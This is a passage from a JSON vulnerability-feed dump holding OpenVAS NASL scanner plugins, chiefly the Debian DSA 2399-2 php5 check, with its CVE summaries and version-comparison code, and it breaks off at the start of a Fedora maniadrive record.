ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1938", "CVE-2011-4885", "CVE-2011-2483", "CVE-2012-0057", "CVE-2011-4566"], "description": "The remote host is missing an update to php5\nannounced via advisory DSA 2399-2.", "modified": "2019-03-18T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:136141256231070717", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070717", "type": "openvas", "title": "Debian Security Advisory DSA 2399-2 (php5)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2399_2.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2399-2 (php5)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70717\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1938\", \"CVE-2011-2483\", \"CVE-2011-4566\", \"CVE-2011-4885\", \"CVE-2012-0057\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 06:38:45 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2399-2 (php5)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6|7)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202399-2\");\n script_tag(name:\"insight\", value:\"A regression was found in the fix for PHP's XSLT transformations\n(CVE-2012-0057). Updated packages are now available to address this\nregression. For reference, the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in PHP, the web scripting\nlanguage. The Common Vulnerabilities and Exposures project identifies\nthe following issues:\n\nCVE-2011-1938\n\nThe UNIX socket handling allowed attackers to trigger a buffer overflow\nvia a long path name.\n\nCVE-2011-2483\n\nThe crypt_blowfish function did not properly handle 8-bit characters,\nwhich made it easier for attackers to determine a cleartext password\nby using knowledge of a password hash.\n\nCVE-2011-4566\n\nWhen used on 32 bit platforms, the exif extension could be used to\ntrigger an integer overflow in the exif_process_IFD_TAG function\nwhen processing a JPEG file.\n\nCVE-2011-4885\n\nIt was possible to trigger hash collisions predictably when parsing\nform parameters, which allows remote attackers to cause a denial of\nservice by sending many crafted parameters.\n\nCVE-2012-0057\n\nWhen applying a crafted XSLT transform, an attacker could write files\nto arbitrary places in the filesystem.\n\nNOTE: the fix for CVE-2011-2483 required changing the behaviour of this\nfunction: it is now incompatible with some old (wrongly) generated hashes\nfor passwords containing 8-bit characters. See the package NEWS entry\nfor details. This change has not been applied to the Lenny version of PHP.\n\nNOTE: at the time of release packages for some architectures are still\nbeing built. They will be installed into the archive as soon as they\narrive.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 5.2.6.dfsg.1-1+lenny15.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 5.3.3-7+squeeze6.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems have been fixed in version 5.3.9-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your php5 packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to php5\nannounced via advisory DSA 2399-2.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.6.dfsg.1-1+lenny15\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.3.3-7+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.3.10-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-2202"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-09-20T00:00:00", "id": "OPENVAS:1361412562310863531", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863531", "type": "openvas", "title": "Fedora Update for maniadrive FEDORA-2011-11528", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for maniadrive FEDORA-2011-11528\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# 